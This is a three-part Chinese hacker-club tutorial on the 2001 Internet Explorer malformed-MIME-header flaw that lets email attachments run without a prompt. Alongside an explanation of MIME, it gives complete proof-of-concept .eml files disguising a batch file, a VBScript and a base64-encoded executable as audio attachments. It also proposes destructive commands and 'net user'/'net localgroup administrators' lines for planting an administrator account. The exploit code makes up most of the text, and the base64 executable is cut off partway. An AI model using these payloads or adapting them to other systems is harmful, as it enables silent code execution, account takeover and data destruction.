利用错误的MIME头实行攻击

最新推荐文章于 2024-08-16 23:44:41 发布
最新推荐文章于 2024-08-16 23:44:41 发布
阅读量1.1k 收藏
点赞数
分类专栏: 黑客技术 文章标签: 浏览器 internet microsoft 服务器 html ie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrub/article/details/353889
版权
badboy  坏男孩俱乐部
badboyclub.yofor.net
badboyclub.163.net
badboyclub.go.163.com
这并不是什么权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫
用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由
你自己负责。
本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目
的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人
将保留侵权控告的权利。
本文内所谈到的程序具有一定的危害性,如果你安全技术能力有限,请勿测试。
—————————————————————————————————

微软安全公告(m$-01-020),错误的MIME头可导致IE执行Email附件
发布时间:2001年3月29日
微软--------------一个以补丁来吸引人的破软件生产制造商。这不,又一个
对个人用户带来极大危害的漏洞再次出笼,你还需要对该死(盖茨)说些什么?
已没什么必要了,快投入到漏洞所带来的思维闪动的快感里去吧!!!

一、MIME的简单介绍

  1.MIME的基本概念
   你可能在使用CGI程序时接触过MIME类型,其中有一行叫作Content-type
的语句,它用来指明传递的是MIME类型的文件(如text/html或text/plain)。
  MIME是Multipurpose Internet Mail Extension的缩写,起初定义为在
Intemet电子信件中的编码方法,现在它已经演化成一种指定文件类型(Internet
的任何形式的消息:e-mail,usenet新闻和Web)的通用方法。
   如果Internet上有两个程序在联系,其中一个发文件,另一个接受文件。
如果发送的是MIME类型的文件,接受程序通过识别会告诉你它是否能够处理。
每一种文件格式都有一组相一致的名称。至于是否匹配,这不应该成为你所
担心的问题,多数标准文件都有对应于MIME类型的文件格式。

  2.MIME类型工作原理
   MIME类型有两部分:一个是文件的一般格式(如文本、图像或应用程序),
再一个就、是文件的特殊的格式(对文本有html、plain格式,对图像有GIF、
JPEG格式)。比较典型的MIME类型一般是text/html、image/gif、video/
quicktime或application/postscripto一旦一组标准的MIME类型已经被定义,
新的类型必须在IANA(Internet Assigned Numbers Authority)中登记。新的
MIME类型在没有正式认可时必须采用以x—开头的命令指定,如
audio/x-noise-from-join或application/x-httpd-cgi:在建立NCSA服务器
时它可以运行CGI程序,包含时也是这种情况:application/x-httpd-cgi和
x-serverd-parsed-htmlo

  3.MIME类型在Web服务器和浏览器上的应用
   Web服务器发送文件到浏览器时将用到MIME类型。其大致过程是这样的:
(1)浏览器通过URL向服务器发出读文件请求:
(2)服务器接到浏览器的请求后从文件系统中取出相应的文件;
(3)服务器在已知的MIME文件扩展对照表中查找该文件的扩展名,如gif、html、
txt 等等;
(4)服务器向浏览器发送一个Content-type头指示将要发送的文件的类型;
(5)浏览器接到Content-type后,对它是否可以单独处理、是否还要调用另一
个浏览器等问题进行辨别。
   这个过程最重要的部分是服务器保存一个固定的文件扩展名与MIME类型
的对照表。这个表决定了服务器可识别的文件类型。在Web中共享的文件一般
都有正确的文件扩展名,并同正确的Content-type一起发送。
   如果你想发送—.个超出Web定义的新类型的文件或者你短时间内突然得
到许多文件,而它们都有新的扩展名,这时你必须配置你的服务器来识别MIME
类型或新的扩展名。
  4.MIME类型与浏览器
   通常浏览器都有一个MIME类型的文件扩展名对照表,这个表一般只能用于
“Openfile”对话框或者一个file:URL命名打开的本地磁盘文件,或用除了
HTTP之外的方法从服务器取回的文件。在多数情况下,浏览器会忽略服务器所
传文件的扩展名而只注意Content-type。
   和服务器一样,浏览器通常也有一个MIME类型与其他浏览器的对照表。这
样你就可以设置浏览器以便处理从Web服务器得到的文件,浏览器使它从
Content-type头得到的值与浏览器的名字和地址相匹配。
   服务器配置文件如果被加入了新的文件类型,这时很有可能浏览器无法识
别它得到的新的文件。如果你增加了这些文件类型并且想使用这些类型,你最
好在作品中加上说明,注明传递的文件类型、使用过的MIME类型以及与读此文
件格式的浏览器的关系等等。


二、错误的MIME头漏洞的发现
该漏洞是由Juan Carlos Garcia Cuartango安全小组发现的,该小组发现在
MEMI在处理不正常的MIME类型中存在问题,攻击者可以建立一个包含可执行
文件的附件的HTML EMAIL并修改MIME头,使IE不正确处理这个MIME所指定的
执行文件附件。一般情况下如果附件是文本文件,IE会读它,如果是VIDEO
CLIP,IE会查看,如果是图形文件,IE就会显示它,但如果是一个EXE文件,
IE就会提示用户是否执行,但具有危害的是,当攻击者更改MIME类型后,IE
就会不经过提示用户是否执行而直接运行,从而使攻击者加在附件中的程序
或者攻击命令能够按照攻击者设想的情况实行。这些内容我们将在后面做一
一分析。
windows95/98/me winNT4 win2k下的
Microsoft Internet Explorer 5.0
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
均存在该漏洞。
  
该安全小组提供一简单的执行hello.eml程序进行测试。
(将以下程序编辑为hello.eml文件即可)
From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
    type="multipart/alternative";
    boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
    boundary="2"


--2
Content-Type: text/html;
    charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
HELLO MY FRIEND!!!<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
    name="hello.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>

echo OFF
dir *.*

--1

------------
点击hello.eml文件后,将会开启OUTLOOK和MSDOS窗口,显示当前文件所在的
文件夹的查看状态。因为仅是dir命令,所以对用户来说不存在什么危害,
该文件只展示在没任何提示下已经运行了dir命令。
在windows/temp目录里我们可以看到这个被执行的临时文件hello.bat、
hello (1).bat,这文件是由hello.eml里面的代码产生的,而在outlook里
面我们只能看见一个0字节的文件ATT00004.txt。当你关闭outlook后,
hello.bat这临时文件就看不到了。

——————————————————————————————————
未完待续。

利用错误的MIME头实行攻击--2
—————————————————————————————————
badboy  坏男孩俱乐部
badboyclub.yofor.net
badboyclub.163.net
badboyclub.go.163.com
这只是网络安全初级读物,只适合菜鸟了解win9x、NT存在的不安全面,切莫
用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由
你自己负责。
本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目
的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人
将保留侵权控告的权利。
本文内所谈到的程序具有一定的危害性,如果你安全技术能力有限,请勿测试。
—————————————————————————————————

三、MIME与command、cmd命令的结合
在上部分内容的例子里,我们可以看到那信件的最后部分的内容为:
--1
Content-Type: audio/x-wav;
    name="hello.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>

echo OFF
dir *.*

--1
机产生的hello.bat文件内的内容是dir *.*
实际上这就是一个最简单的mime错误头漏洞与command、cmd外部命令的最简单
结合。从这我们是不是可以尝试把dir命令变成其他的命令方式呢?事实说明,
MS-DOS下一切命令是可以替换这部份内容的。
对于WIN9X用户来说,只要他的IE浏览器是5.0  5.01  5.5版本,在没打补丁的
情况下,攻击者完全可以利用欺骗的方式让你打开含有攻击命令的MIME错误头
的Email文件,达到攻击的目的。例如format、deletetree、move等一切MS-DOS
下的命令。
而对于WINNT、WIN2K用户,尤其是那些不安分守己的系统管理员利用公司的主
服务器上网且对网络安全知识贫乏的情况下,攻击者可以利用在以上那Email
信件里加上诸如:
net user test  1234567 /add
net localgroup administrators test /add
这样的命令增加用户或者超级用户权限,进一步达到入侵的目的。

因为命令的比较短小,因此攻击者未必需要给你发这样的信件,他可以在某个
网页里加入自动启动的方式,骗你打开,达到攻击目的。

四、错误MIME头调用vbs格式文件
我们先看以下例子:
From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal

--1
Content-Type: multipart/alternative;
boundary="2"


--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
I will create the file C:/deleteme.txt<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
name="hack.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>

set objFileSystem =3D CreateObject("Scripting.FileSystemObject")
set objOutputFile =3D objFileSystem.CreateTextFile("C:/deleteme.txt", 1)
objOutputFile.writeline("You can delete this file.")
objOutputFile.close
msgbox "I have created the file : c:/deleteme.txt"


--1

将该程序编辑存为一eml格式的文件,例如vbs.eml,我们运行它,可以看到
屏幕弹开一VBScript窗体,并可以看见在C:/下建立了一deleteme.txt文件.
而邮件的附件中为att00002.txt的一字节为0的文件。
如果你安装了超级解霸之类的软件,运行vbs.eml后超级解霸会自动执行。
对于这种调用VBS文件的形式,会有多大危害呢?想一下,爱虫病毒是怎么样的?
爱虫病毒还需要骗你执行它,但一旦和错误mime头漏洞结合起来,就根本不需要
你执行了,只要你收了这封信且阅读它,你就中招了。
从5月2日开始,一个名叫VBS.happytime正在网络的流行,据说已经感染了10万
电脑,而且还有进一步扩大的趋势,但目前它还没和错误的MIME头漏洞结合,
一旦好事者把两个关联起来,后果不堪设想。



——————————————————————————————————
未完待续。

利用错误的MIME头实行攻击--3
—————————————————————————————————
badboy  坏男孩俱乐部
badboyclub.yofor.net
badboyclub.163.net
badboyclub.go.163.com
这只是网络安全初级读物,只适合菜鸟了解win9x、NT存在的不安全面,切莫
用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由
你自己负责。
本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目
的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人
将保留侵权控告的权利。
本文内所谈到的程序具有一定的危害性,如果你安全技术能力有限,请勿测试。
—————————————————————————————————
五、错误MIME头信件自动执行exe文件
漏洞发现者给我们展示了这样的一个exe.eml文件
From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
boundary="2"


--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
I will execute a program<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
name="hello.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAACPivnby+uXiMvrl4jL65eISPeZiMrrl4ii9J6IyuuXiCL0mojK65eIUmlj
aMvrl4gAAAAAAAAAAFBFAABMAQMAz/SLOgAAAAAAAAAA4AAPAQsBBgAAIAAAACAAAAAAAAAIEgAA
ABAAAAAwAAAAAEAAABAAAAAQAAAEAAAAAQAAAAQAAAAAAAAAAFAAAAAQAACljAAAAgAAAAAAEAAA
EAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAVB4AACgAAAAAQAAApAgAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAgAAIAAA
AAAQAAC0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAADEEQAAABAAAAAgAAAAEAAA
AAAAAAAAAAAAAAAAIAAAYC5kYXRhAAAA5AkAAAAwAAAAEAAAADAAAAAAAAAAAAAAAAAAAEAAAMAu
cnNyYwAAAKQIAAAAQAAAABAAAABAAAAAAAAAAAAAAAAAAABAAABA8ZlDOBAAAAAAAAAAAAAAAE1T
VkJWTTYwLkRMTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALSNrGpgRaxq
cnitap7wrGpUTZ9qc/CsaiE+rGqoRKxqbk2fatU9rGrqFKtqcz6faiMLq2ptPqxqbT+sahyPrGr2
PZ9qHF2faovQnmpdRaxqg+KfasGPrGrRQ6pqokefap5Zn2rwQaxqIT+samd9rWpZjqxqyVGfaqE+
rGqhP6xq1T6sahA5rGqi3Z1qFYCtasr2rGrujKxqpUCfanaKn2rC/KtqcpCsag3rq2pFQZ9qAAAA
AAAAAAAnABQA7x1AABseQAD2HUAAAAAAANAQQAAJAAAAZRxAAGwcQADJHEAA2BxAAAQdQAA2HUAA
Uh1AAGEdQADoHUAAAAAAAAAAAAD/JUAQQAD/JVwQQAD/JWwQQAD/JTQQQAD/JSQQQAD/JXgQQAD/
JRgQQAD/JYQQQAD/JTgQQAD/JYAQQAD/JXwQQAD/JWgQQAD/JUwQQAD/JWQQQAD/JRwQQAD/JQQQ
QAD/JZQQQAD/JQAQQAD/JagQQAD/JXAQQAD/JTwQQAD/JVQQQAD/JaQQQAD/JaAQQAD/JQwQQAD/
JYwQQAD/JTAQQAD/JUQQQAD/JWAQQAD/JawQQAD/JZwQQAD/JXQQQAD/JSAQQAD/JQgQQAD/JSwQ
QAD/JRQQQAD/JZAQQAD/JSgQQAD/JRAQQAD/JZgQQAD/JVgQQAD/JUgQQAD/JVAQQAD/JYgQQABo
qBNAAOjwAAAAAAAAMAAAAEAAAAAAAAAAf2WQNIHeXkyWI2mfx1puoAAAAAAAAAEAAAAAAAAA
AABQcm9qZWN0MQAAAAAAAAAAAAAAAP/MMQABQkPB7MzTPU2bc+bPC56C4DxMAx2e6y1AlnJDM3sV
JnU6T60zmWbPEbcMAKoAYNOTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApgAA
AEcAAAAABQBGb3JtMQANAQ4AU2VjdXJpdHkgSXNzdWUAGQEAQgAj/yQFAEZvcm0xADU8AAAA
WQEAAEgSAABWBAAARgP/AVgAAAABBgBMYWJlbDEAAQEfAFlvdXIgc3lzdGVtIGhhcyBhIHZ1bG5l
cmFiaWxpdHkABWgB8AB3EO8BEgAAJQEAAACQAVgPAgANTVMgU2FucyBTZXJpZv8CBABQAAAAQkPB
7MzTPU2bc+bPC56C4AAAAAAAAAAAAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/wAAAAAAAABYEkAATAAAAFZCNSHwHyoAAAAAAAAAAAAAAAAAfgAAAAAAAAAAAAAAAAAKAAkEAAAA
AAAAAAAAABQWQAAC8DAAAP///wgAAAABAAAAAQAAAOkAAABYE0AAWBNAABQSQAB4AAAAgQAAAIoA
AACLAAAAAAAAAAAAAAAAAAAAAAAAAFByb2plY3QxAFByb2plY3QxAABQcm9qZWN0MQABAAAAUBhA
AAAAAAC4G0AA/wAAAACkGEAACDBAAAAAAAAgxRkAAAAAAAAAAAAAAAAAtBRAAAEAAAAAGUAA
AAAAALQUQAABAAAAvBRAAAAAAAC4FEAAAgAAALwUQAABALcBaABsAAwVQADcMkAAAAAAAOAkEwAQ
GUAAIBlAAEAAEgA0AAAAMBlAAAEAAwAAAAAAAAAAABAVQAAAZRcAQBlAAAEAAwBAAB8AOAAAALwZ
QAD/AAAAAAAAAABwFUAAEGUXAMwZQAD/DBZAAAAAAAC8FEAAPBRAAPARQAD2EUAA/BFA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAADkFEAAPBRAAPARQAD2EUAA/BFAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAQWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBbCQENwAA
AOn/BQAAAAAA9AEAAFAYQAAAAAAAABxAAFAeQADcCQAACDBAAAYRQAAAMEAAKgBcAEEAQwA6AFwA
ZABlAHYAXABwAHIAbwBnAFwAUAByAG8AagBlAGMAdAAxAC4AdgBiAHAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAWBNAAAAAAAAAAAAALDBAAHgbQAD/AAAAABwwQADMnswoC6bKTJQCOxofHnPiCgABAAQA
AQCkGEAAAAAAAAAAAAAAAAAA3BhAAAkEAAAKDAAAAAAAAAIAAAA8FEAA/9QZQAAAAAAAAAAA
AAAAAADoGEAAAQAAANQYQAD//wAAg4ABAAAAAAAAAAAAAAAAAFByb2plY3QxAAAAAEZvcm0xAAAA
PEwDHZ7rLUCWckMzexUmdfv8bEiI0PJGpT+CeVJbWbNCQ8HszNM9TZtz5s8LnoLgR2H9LC52AEmi
gQmtF7PQG9pOrTOZZs8RtwwAqgBg05NMYWJlbDEAAC49+/z6oGgQpzgIACszcbVDOlxQcm9ncmFt
IEZpbGVzXE1pY3Jvc29mdCBWaXN1YWwgU3R1ZGlvXFZCOThcVkI2Lk9MQgAAAFZCAABIGUAAAAAA
AAYAAAAJAAAAWBlAAJAZQADQMkAAAAAAAAAAAAC4TBcAOk+tM5lmzxG3DACqAGDTk0Zvcm0AAAAA
DABEAAAAAAAAAAAACAAAAFQARQBNAFAAAAAAABoAAABcAGQAZQBsAGUAdABlAG0AZQAuAHQAeAB0
AAAAX192YmFGcmVlU3RyAAAAAF9fdmJhVmFyRHVwAAAAAAAwAAAAWQBvAHUAIABjAGEAbgAgAGQA
ZQBsAGUAdABlACAAdABoAGkAcwAgAGYAaQBsAGUAAAAAAAQAAAABAIgAMgAAAEkAIABoAGEAdgBl
ACAAdwByAGkAdAB0AHQAZQBuACAAYQAgAGYAaQBsAGUAIAA6ACAAAABWQkE2LkRMTAAAAABfX3Zi
YUZyZWVWYXIAAAAAX192YmFWYXJBZGQAX192YmFGaWxlQ2xvc2UAAF9fdmJhUHJpbnRGaWxlAABf
X3ZiYVN0clZhckNvcHkAX192YmFGaWxlT3BlbgAAAF9fdmJhU3RyQ2F0AF9fdmJhVmFyTW92ZQAA
AABfX3ZiYU9uRXJyb3IAAAAAX192YmFGcmVlVmFyTGlzdAAAAABfX3ZiYVN0clZhck1vdmUAX192
YmFTdHJNb3ZlAAAAALgbQAAAAAAAAAAAAFAYQAD/AAAAAHAbQAAAAAAAAAAAAAAAAAD/
AAAAAJQZQAAwGUAA1DJAAJQZQAC8GUAA2DJAAAAAAAA8FEAA/wAAAAAAAAAAAAAAAHQbQAAA
